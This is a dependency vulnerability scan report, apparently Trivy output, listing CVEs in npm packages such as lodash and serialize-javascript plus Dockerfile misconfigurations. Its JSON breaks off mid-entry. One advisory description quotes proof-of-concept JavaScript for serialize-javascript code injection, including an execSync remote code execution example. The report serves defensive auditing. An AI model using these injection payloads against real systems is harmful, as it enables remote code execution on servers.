Critical
High
Medium
Low
Secrets
Misconfig
| Severity | CVE ID | Package | Installed | Fixed In | Description |
|---|---|---|---|---|---|
| HIGH | CVE-2020-8203 | lodash | 4.17.14 | 4.17.19 | nodejs-lodash: prototype pollution in zipObjectDeep function |
| HIGH | CVE-2021-23337 | lodash | 4.17.14 | 4.17.21 | nodejs-lodash: command injection via template |
| HIGH | CVE-2026-4800 | lodash | 4.17.14 | 4.18.0 | lodash: Arbitrary code execution via untrusted input in template imports |
| MEDIUM | CVE-2020-28500 | lodash | 4.17.14 | 4.17.21 | nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions |
| MEDIUM | CVE-2025-13465 | lodash | 4.17.14 | 4.17.23 | lodash: prototype pollution in _.unset and _.omit functions |
| MEDIUM | CVE-2026-2950 | lodash | 4.17.14 | 4.18.0 | Lodash versions 4.17.23 and earlier are vulnerable to prototype pollution in the _.unset and _.omit functions (bypass of the CVE-2025-13465 fix) |
| HIGH | CVE-2021-3803 | nth-check | 1.0.2 | 2.0.1 | nodejs-nth-check: inefficient regular expression complexity |
| MEDIUM | CVE-2023-44270 | postcss | 7.0.39 | 8.4.31 | PostCSS: Improper input validation in PostCSS |
| MEDIUM | CVE-2021-3163 | quill | 1.3.7 | No fix | Cross-site Scripting in quill |
| HIGH | GHSA-5c6j-r48x-rmvq | serialize-javascript | 4.0.0 | 7.0.3 | Serialize JavaScript is Vulnerable to RCE via RegExp.flags and Date.prototype.toISOString() |
| MEDIUM | CVE-2026-34043 | serialize-javascript | 4.0.0 | 7.0.5 | serialize-javascript: Denial of Service via specially crafted array-like object serialization |
| HIGH | GHSA-5c6j-r48x-rmvq | serialize-javascript | 6.0.2 | 7.0.3 | Serialize JavaScript is Vulnerable to RCE via RegExp.flags and Date.prototype.toISOString() |
| MEDIUM | CVE-2026-34043 | serialize-javascript | 6.0.2 | 7.0.5 | serialize-javascript: Denial of Service via specially crafted array-like object serialization |
| HIGH | CVE-2026-27601 | underscore | 1.13.6 | 1.13.8 | Underscore.js: Denial of Service via recursive data structures in flatten and isEqual |
| MEDIUM | CVE-2025-30359 | webpack-dev-server | 4.15.2 | 5.2.1 | webpack-dev-server: webpack-dev-server information exposure |
| MEDIUM | CVE-2025-30360 | webpack-dev-server | 4.15.2 | 5.2.1 | webpack-dev-server: webpack-dev-server information exposure |
| Type | File | Line | Match |
|---|---|---|---|
| ✅ No secrets found | | | |
| Severity | ID | Check | File | Message |
|---|---|---|---|---|
| HIGH | DS002 | Image user should not be 'root' | Dockerfile | Specify at least 1 USER command in Dockerfile with non-root user as argument |
| MEDIUM | DS001 | ':latest' tag used | node_modules/@surma/rollup-plugin-off-main-thread/Dockerfile | Specify a tag in the 'FROM' statement for image 'selenium/node-chrome' |
| HIGH | DS002 | Image user should not be 'root' | node_modules/@surma/rollup-plugin-off-main-thread/Dockerfile | Last USER command in Dockerfile should not be 'root' |
| HIGH | DS017 | `RUN <package-manager> update` instruction alone | node_modules/@surma/rollup-plugin-off-main-thread/Dockerfile | The instruction `RUN <package-manager> update` should always be followed by `<package-manager> install` in the same RUN statement |
| HIGH | DS002 | Image user should not be 'root' | node_modules/jsonpath/Dockerfile | Specify at least 1 USER command in Dockerfile with non-root user as argument |
{
"SchemaVersion": 2,
"CreatedAt": "2026-04-13T06:28:25.695638897Z",
"ArtifactName": "/src",
"ArtifactType": "filesystem",
"Metadata": {
"ImageConfig": {
"architecture": "",
"created": "0001-01-01T00:00:00Z",
"os": "",
"rootfs": {
"type": "",
"diff_ids": null
},
"config": {}
}
},
"Results": [
{
"Target": "package-lock.json",
"Class": "lang-pkgs",
"Type": "npm",
"Vulnerabilities": [
{
"VulnerabilityID": "CVE-2020-8203",
"PkgID": "lodash@4.17.14",
"PkgName": "lodash",
"PkgIdentifier": {
"PURL": "pkg:npm/lodash@4.17.14"
},
"InstalledVersion": "4.17.14",
"FixedVersion": "4.17.19",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2020-8203",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory npm",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm"
},
"Title": "nodejs-lodash: prototype pollution in zipObjectDeep function",
"Description": "Prototype pollution attack when using _.zipObjectDeep in lodash before 4.17.20.",
"Severity": "HIGH",
"CweIDs": [
"CWE-770",
"CWE-1321"
],
"VendorSeverity": {
"ghsa": 3,
"nvd": 3,
"redhat": 2,
"ruby-advisory-db": 3
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H",
"V3Score": 7.4
},
"nvd": {
"V2Vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P",
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H",
"V2Score": 5.8,
"V3Score": 7.4
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H",
"V3Score": 7.4
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2020-8203",
"https://github.com/advisories/GHSA-p6mc-m468-83gw",
"https://github.com/github/advisory-database/pull/2884",
"https://github.com/lodash/lodash",
"https://github.com/lodash/lodash/commit/c84fe82760fb2d3e03a63379b297a1cc1a2fce12",
"https://github.com/lodash/lodash/issues/4744",
"https://github.com/lodash/lodash/issues/4874",
"https://github.com/lodash/lodash/wiki/Changelog#v41719",
"https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2020-8203.yml",
"https://hackerone.com/reports/712065",
"https://hackerone.com/reports/864701",
"https://nvd.nist.gov/vuln/detail/CVE-2020-8203",
"https://security.netapp.com/advisory/ntap-20200724-0006",
"https://security.netapp.com/advisory/ntap-20200724-0006/",
"https://web.archive.org/web/20210914001339/https://github.com/lodash/lodash/issues/4744",
"https://www.cve.org/CVERecord?id=CVE-2020-8203",
"https://www.npmjs.com/advisories/1523",
"https://www.oracle.com//security-alerts/cpujul2021.html",
"https://www.oracle.com/security-alerts/cpuApr2021.html",
"https://www.oracle.com/security-alerts/cpuapr2022.html",
"https://www.oracle.com/security-alerts/cpujan2022.html",
"https://www.oracle.com/security-alerts/cpuoct2021.html"
],
"PublishedDate": "2020-07-15T17:15:11.797Z",
"LastModifiedDate": "2024-11-21T05:38:29.79Z"
},
{
"VulnerabilityID": "CVE-2021-23337",
"PkgID": "lodash@4.17.14",
"PkgName": "lodash",
"PkgIdentifier": {
"PURL": "pkg:npm/lodash@4.17.14"
},
"InstalledVersion": "4.17.14",
"FixedVersion": "4.17.21",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2021-23337",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory npm",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm"
},
"Title": "nodejs-lodash: command injection via template",
"Description": "Lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function.",
"Severity": "HIGH",
"CweIDs": [
"CWE-94"
],
"VendorSeverity": {
"ghsa": 3,
"nvd": 3,
"redhat": 2,
"ruby-advisory-db": 3,
"ubuntu": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"V3Score": 7.2
},
"nvd": {
"V2Vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"V2Score": 6.5,
"V3Score": 7.2
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"V3Score": 7.2
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2021-23337",
"https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf",
"https://github.com/advisories/GHSA-35jh-r3h4-6jhm",
"https://github.com/lodash/lodash",
"https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js",
"https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js#L14851",
"https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js%23L14851",
"https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c",
"https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2021-23337.yml",
"https://nvd.nist.gov/vuln/detail/CVE-2021-23337",
"https://security.netapp.com/advisory/ntap-20210312-0006",
"https://security.netapp.com/advisory/ntap-20210312-0006/",
"https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074932",
"https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074930",
"https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074928",
"https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074931",
"https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074929",
"https://snyk.io/vuln/SNYK-JS-LODASH-1040724",
"https://www.cve.org/CVERecord?id=CVE-2021-23337",
"https://www.oracle.com//security-alerts/cpujul2021.html",
"https://www.oracle.com/security-alerts/cpujan2022.html",
"https://www.oracle.com/security-alerts/cpujul2022.html",
"https://www.oracle.com/security-alerts/cpuoct2021.html"
],
"PublishedDate": "2021-02-15T13:15:12.56Z",
"LastModifiedDate": "2024-11-21T05:51:31.643Z"
},
{
"VulnerabilityID": "CVE-2026-4800",
"PkgID": "lodash@4.17.14",
"PkgName": "lodash",
"PkgIdentifier": {
"PURL": "pkg:npm/lodash@4.17.14"
},
"InstalledVersion": "4.17.14",
"FixedVersion": "4.18.0",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-4800",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory npm",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm"
},
"Title": "lodash: lodash: Arbitrary code execution via untrusted input in template imports",
"Description": "Impact:\n\nThe fix for CVE-2021-23337 (https://github.com/advisories/GHSA-35jh-r3h4-6jhm) added validation for the variable option in _.template but did not apply the same validation to options.imports key names. Both paths flow into the same Function() constructor sink.\n\nWhen an application passes untrusted input as options.imports key names, an attacker can inject default-parameter expressions that execute arbitrary code at template compilation time.\n\nAdditionally, _.template uses assignInWith to merge imports, which enumerates inherited properties via for..in. If Object.prototype has been polluted by any other vector, the polluted keys are copied into the imports object and passed to Function().\n\nPatches:\n\nUsers should upgrade to version 4.18.0.\n\nWorkarounds:\n\nDo not pass untrusted input as key names in options.imports. Only use developer-controlled, static key names.",
"Severity": "HIGH",
"CweIDs": [
"CWE-94"
],
"VendorSeverity": {
"ghsa": 3,
"nvd": 4,
"redhat": 3
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"V3Score": 8.1
},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"V3Score": 9.8
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"V3Score": 8.1
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2026-4800",
"https://cna.openjsf.org/security-advisories.html",
"https://github.com/advisories/GHSA-35jh-r3h4-6jhm",
"https://github.com/lodash/lodash",
"https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c",
"https://github.com/lodash/lodash/security/advisories/GHSA-r5fr-rjxr-66jc",
"https://nvd.nist.gov/vuln/detail/CVE-2026-4800",
"https://www.cve.org/CVERecord?id=CVE-2026-4800"
],
"PublishedDate": "2026-03-31T20:16:29.66Z",
"LastModifiedDate": "2026-04-07T15:43:13.197Z"
},
{
"VulnerabilityID": "CVE-2020-28500",
"PkgID": "lodash@4.17.14",
"PkgName": "lodash",
"PkgIdentifier": {
"PURL": "pkg:npm/lodash@4.17.14"
},
"InstalledVersion": "4.17.14",
"FixedVersion": "4.17.21",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2020-28500",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory npm",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm"
},
"Title": "nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions",
"Description": "Lodash versions prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions.",
"Severity": "MEDIUM",
"VendorSeverity": {
"ghsa": 2,
"nvd": 2,
"redhat": 2,
"ruby-advisory-db": 2,
"ubuntu": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"V3Score": 5.3
},
"nvd": {
"V2Vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"V2Score": 5,
"V3Score": 5.3
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"V3Score": 5.3
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2020-28500",
"https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf",
"https://github.com/advisories/GHSA-29mw-wpgm-hmr9",
"https://github.com/github/advisory-database/pull/6139",
"https://github.com/lodash/lodash",
"https://github.com/lodash/lodash/blob/npm/trimEnd.js",
"https://github.com/lodash/lodash/blob/npm/trimEnd.js#L8",
"https://github.com/lodash/lodash/blob/npm/trimEnd.js%23L8",
"https://github.com/lodash/lodash/commit/c4847ebe7d14540bb28a8b932a9ce1b9ecbfee1a",
"https://github.com/lodash/lodash/pull/5065",
"https://github.com/lodash/lodash/pull/5065/commits/02906b8191d3c100c193fe6f7b27d1c40f200bb7",
"https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2020-28500.yml",
"https://nvd.nist.gov/vuln/detail/CVE-2020-28500",
"https://security.netapp.com/advisory/ntap-20210312-0006",
"https://security.netapp.com/advisory/ntap-20210312-0006/",
"https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074896",
"https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074894",
"https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074892",
"https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074895",
"https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074893",
"https://snyk.io/vuln/SNYK-JS-LODASH-1018905",
"https://www.cve.org/CVERecord?id=CVE-2020-28500",
"https://www.oracle.com//security-alerts/cpujul2021.html",
"https://www.oracle.com/security-alerts/cpujan2022.html",
"https://www.oracle.com/security-alerts/cpujul2022.html",
"https://www.oracle.com/security-alerts/cpuoct2021.html"
],
"PublishedDate": "2021-02-15T11:15:12.397Z",
"LastModifiedDate": "2024-11-21T05:22:55.053Z"
},
{
"VulnerabilityID": "CVE-2025-13465",
"PkgID": "lodash@4.17.14",
"PkgName": "lodash",
"PkgIdentifier": {
"PURL": "pkg:npm/lodash@4.17.14"
},
"InstalledVersion": "4.17.14",
"FixedVersion": "4.17.23",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-13465",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory npm",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm"
},
"Title": "lodash: prototype pollution in _.unset and _.omit functions",
"Description": "Lodash versions 4.0.0 through 4.17.22 are vulnerable to prototype pollution in the _.unset\u00a0and _.omit\u00a0functions. An attacker can pass crafted paths which cause Lodash to delete methods from global prototypes.\n\nThe issue permits deletion of properties but does not allow overwriting their original behavior.\n\nThis issue is patched on 4.17.23",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-1321"
],
"VendorSeverity": {
"alma": 3,
"ghsa": 2,
"nvd": 2,
"oracle-oval": 3,
"redhat": 3
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
"V3Score": 6.5
},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"V3Score": 5.3
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"V3Score": 8.2
}
},
"References": [
"https://access.redhat.com/errata/RHSA-2026:2452",
"https://access.redhat.com/security/cve/CVE-2025-13465",
"https://bugzilla.redhat.com/2431740",
"https://errata.almalinux.org/9/ALSA-2026-2452.html",
"https://github.com/lodash/lodash",
"https://github.com/lodash/lodash/commit/edadd452146f7e4bad4ea684e955708931d84d81",
"https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg",
"https://linux.oracle.com/cve/CVE-2025-13465.html",
"https://linux.oracle.com/errata/ELSA-2026-2452.html",
"https://nvd.nist.gov/vuln/detail/CVE-2025-13465",
"https://www.cve.org/CVERecord?id=CVE-2025-13465"
],
"PublishedDate": "2026-01-21T20:16:05.25Z",
"LastModifiedDate": "2026-02-17T17:10:07.52Z"
},
{
"VulnerabilityID": "CVE-2026-2950",
"PkgID": "lodash@4.17.14",
"PkgName": "lodash",
"PkgIdentifier": {
"PURL": "pkg:npm/lodash@4.17.14"
},
"InstalledVersion": "4.17.14",
"FixedVersion": "4.18.0",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-2950",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory npm",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm"
},
"Title": "Impact: Lodash versions 4.17.23 and earlier are vulnerable to prototy ...",
"Description": "Impact:\n\nLodash versions 4.17.23 and earlier are vulnerable to prototype pollution in the _.unset and _.omit functions. The fix for (CVE-2025-13465: https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg) only guards against string key members, so an attacker can bypass the check by passing array-wrapped path segments. This allows deletion of properties from built-in prototypes such as Object.prototype, Number.prototype, and String.prototype.\n\nThe issue permits deletion of prototype properties but does not allow overwriting their original behavior.\n\nPatches:\n\nThis issue is patched in 4.18.0.\n\nWorkarounds:\n\nNone. Upgrade to the patched version.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-1321"
],
"VendorSeverity": {
"ghsa": 2,
"nvd": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
"V3Score": 6.5
},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"V3Score": 5.3
}
},
"References": [
"https://github.com/lodash/lodash",
"https://github.com/lodash/lodash/security/advisories/GHSA-f23m-r3pf-42rh",
"https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg",
"https://nvd.nist.gov/vuln/detail/CVE-2026-2950"
],
"PublishedDate": "2026-03-31T20:16:26.207Z",
"LastModifiedDate": "2026-04-07T16:12:25.97Z"
},
{
"VulnerabilityID": "CVE-2021-3803",
"PkgID": "nth-check@1.0.2",
"PkgName": "nth-check",
"PkgIdentifier": {
"PURL": "pkg:npm/nth-check@1.0.2"
},
"InstalledVersion": "1.0.2",
"FixedVersion": "2.0.1",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2021-3803",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory npm",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm"
},
"Title": "nodejs-nth-check: inefficient regular expression complexity",
"Description": "nth-check is vulnerable to Inefficient Regular Expression Complexity",
"Severity": "HIGH",
"CweIDs": [
"CWE-1333"
],
"VendorSeverity": {
"ghsa": 3,
"nvd": 3,
"redhat": 2,
"ubuntu": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
},
"nvd": {
"V2Vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V2Score": 5,
"V3Score": 7.5
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2021-3803",
"https://github.com/advisories/GHSA-rp65-9cf3-cjxr",
"https://github.com/fb55/nth-check",
"https://github.com/fb55/nth-check/commit/9894c1d2010870c351f66c6f6efcf656e26bb726",
"https://github.com/fb55/nth-check/commit/9894c1d2010870c351f66c6f6efcf656e26bb726 (v2.0.1)",
"https://huntr.dev/bounties/8cf8cc06-d2cf-4b4e-b42c-99fafb0b04d0",
"https://huntr.dev/bounties/8cf8cc06-d2cf-4b4e-b42c-99fafb0b04d0/",
"https://lists.debian.org/debian-lts-announce/2023/05/msg00023.html",
"https://nvd.nist.gov/vuln/detail/CVE-2021-3803",
"https://ubuntu.com/security/notices/USN-6114-1",
"https://www.cve.org/CVERecord?id=CVE-2021-3803"
],
"PublishedDate": "2021-09-17T07:15:09.153Z",
"LastModifiedDate": "2024-11-21T06:22:28.873Z"
},
{
"VulnerabilityID": "CVE-2023-44270",
"PkgID": "postcss@7.0.39",
"PkgName": "postcss",
"PkgIdentifier": {
"PURL": "pkg:npm/postcss@7.0.39"
},
"InstalledVersion": "7.0.39",
"FixedVersion": "8.4.31",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2023-44270",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory npm",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm"
},
"Title": "PostCSS: Improper input validation in PostCSS",
"Description": "An issue was discovered in PostCSS before 8.4.31. The vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being included in a comment.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-74"
],
"VendorSeverity": {
"ghsa": 2,
"nvd": 2,
"redhat": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"V3Score": 5.3
},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"V3Score": 5.3
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"V3Score": 5.3
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2023-44270",
"https://github.com/github/advisory-database/issues/2820",
"https://github.com/postcss/postcss",
"https://github.com/postcss/postcss/blob/main/lib/tokenize.js#L25",
"https://github.com/postcss/postcss/commit/58cc860b4c1707510c9cd1bc1fa30b423a9ad6c5",
"https://github.com/postcss/postcss/releases/tag/8.4.31",
"https://lists.debian.org/debian-lts-announce/2024/12/msg00025.html",
"https://nvd.nist.gov/vuln/detail/CVE-2023-44270",
"https://www.cve.org/CVERecord?id=CVE-2023-44270"
],
"PublishedDate": "2023-09-29T22:15:11.867Z",
"LastModifiedDate": "2025-11-03T22:16:27.913Z"
},
{
"VulnerabilityID": "CVE-2021-3163",
"PkgID": "quill@1.3.7",
"PkgName": "quill",
"PkgIdentifier": {
"PURL": "pkg:npm/quill@1.3.7"
},
"InstalledVersion": "1.3.7",
"Status": "affected",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2021-3163",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory npm",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm"
},
"Title": "Cross-site Scripting in quill",
"Description": "A vulnerability in the HTML editor of Slab Quill 4.8.0 allows an attacker to execute arbitrary JavaScript by storing an XSS payload (a crafted onloadstart attribute of an IMG element) in a text field. Note: Researchers have claimed that this issue is not within the product itself, but is intended behavior in a web browser",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-79"
],
"VendorSeverity": {
"ghsa": 2,
"nvd": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N",
"V3Score": 4.2
},
"nvd": {
"V2Vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"V2Score": 4.3,
"V3Score": 6.1
}
},
"References": [
"https://burninatorsec.blogspot.com/2021/04/cve-2021-3163-xss-slab-quill-js.html",
"https://github.com/quilljs/quill",
"https://github.com/quilljs/quill/issues/3273",
"https://github.com/quilljs/quill/issues/3359",
"https://github.com/quilljs/quill/issues/3364",
"https://nvd.nist.gov/vuln/detail/CVE-2021-3163",
"https://quilljs.com"
],
"PublishedDate": "2021-04-12T21:15:14.34Z",
"LastModifiedDate": "2024-11-21T06:21:02.183Z"
},
{
"VulnerabilityID": "GHSA-5c6j-r48x-rmvq",
"PkgID": "serialize-javascript@4.0.0",
"PkgName": "serialize-javascript",
"PkgIdentifier": {
"PURL": "pkg:npm/serialize-javascript@4.0.0"
},
"InstalledVersion": "4.0.0",
"FixedVersion": "7.0.3",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://github.com/advisories/GHSA-5c6j-r48x-rmvq",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory npm",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm"
},
"Title": "Serialize JavaScript is Vulnerable to RCE via RegExp.flags and Date.prototype.toISOString()",
"Description": "### Impact\n\nThe serialize-javascript npm package (versions <= 7.0.2) contains a code injection vulnerability. It is an incomplete fix for CVE-2020-7660.\n\nWhile `RegExp.source` is sanitized, `RegExp.flags` is interpolated directly into the generated output without escaping. A similar issue exists in `Date.prototype.toISOString()`.\n\nIf an attacker can control the input object passed to `serialize()`, they can inject malicious JavaScript via the flags property of a RegExp object. When the serialized string is later evaluated (via `eval`, `new Function`, or `<script>` tags), the injected code executes.\n\n```javascript\nconst serialize = require('serialize-javascript');\n// Create an object that passes instanceof RegExp with a spoofed .flags\nconst fakeRegex = Object.create(RegExp.prototype);\nObject.defineProperty(fakeRegex, 'source', { get: () => 'x' });\nObject.defineProperty(fakeRegex, 'flags', {\n get: () => '\"+(global.PWNED=\"CODE_INJECTION_VIA_FLAGS\")+\"'\n});\nfakeRegex.toJSON = function() { return '@placeholder'; };\nconst output = serialize({ re: fakeRegex });\n// Output: {\"re\":new RegExp(\"x\", \"\"+(global.PWNED=\"CODE_INJECTION_VIA_FLAGS\")+\"\")}\nlet obj;\neval('obj = ' + output);\nconsole.log(global.PWNED); // \"CODE_INJECTION_VIA_FLAGS\" \u2014 injected code executed!\n#h2. PoC 2: Code Injection via Date.toISOString()\n```\n\n```javascript\nconst serialize = require('serialize-javascript');\nconst fakeDate = Object.create(Date.prototype);\nfakeDate.toISOString = function() { return '\"+(global.DATE_PWNED=\"DATE_INJECTION\")+\"'; };\nfakeDate.toJSON = function() { return '2024-01-01'; };\nconst output = serialize({ d: fakeDate });\n// Output: {\"d\":new Date(\"\"+(global.DATE_PWNED=\"DATE_INJECTION\")+\"\")}\neval('obj = ' + output);\nconsole.log(global.DATE_PWNED); // \"DATE_INJECTION\" \u2014 injected code executed!\n#h2. PoC 3: Remote Code Execution\n```\n\n```javascript\nconst serialize = require('serialize-javascript');\nconst rceRegex = Object.create(RegExp.prototype);\nObject.defineProperty(rceRegex, 'source', { get: () => 'x' });\nObject.defineProperty(rceRegex, 'flags', {\n get: () => '\"+require(\"child_process\").execSync(\"id\").toString()+\"'\n});\nrceRegex.toJSON = function() { return '@rce'; };\nconst output = serialize({ re: rceRegex });\n// Output: {\"re\":new RegExp(\"x\", \"\"+require(\"child_process\").execSync(\"id\").toString()+\"\")}\n// When eval'd on a Node.js server, executes the \"id\" system command\n```\n\n### Patches\n\nThe fix has been published in version 7.0.3. https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3",
"Severity": "HIGH",
"VendorSeverity": {
"ghsa": 3
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"V3Score": 8.1
}
},
"References": [
"https://github.com/advisories/GHSA-hxcc-f52p-wc94",
"https://github.com/yahoo/serialize-javascript",
"https://github.com/yahoo/serialize-javascript/commit/2e609d0a9f4f5b097f0945af88bd45b9c7fb48d9",
"https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3",
"https://github.com/yahoo/serialize-javascript/security/advisories/GHSA-5c6j-r48x-rmvq",
"https://nvd.nist.gov/vuln/detail/CVE-2020-7660"
],
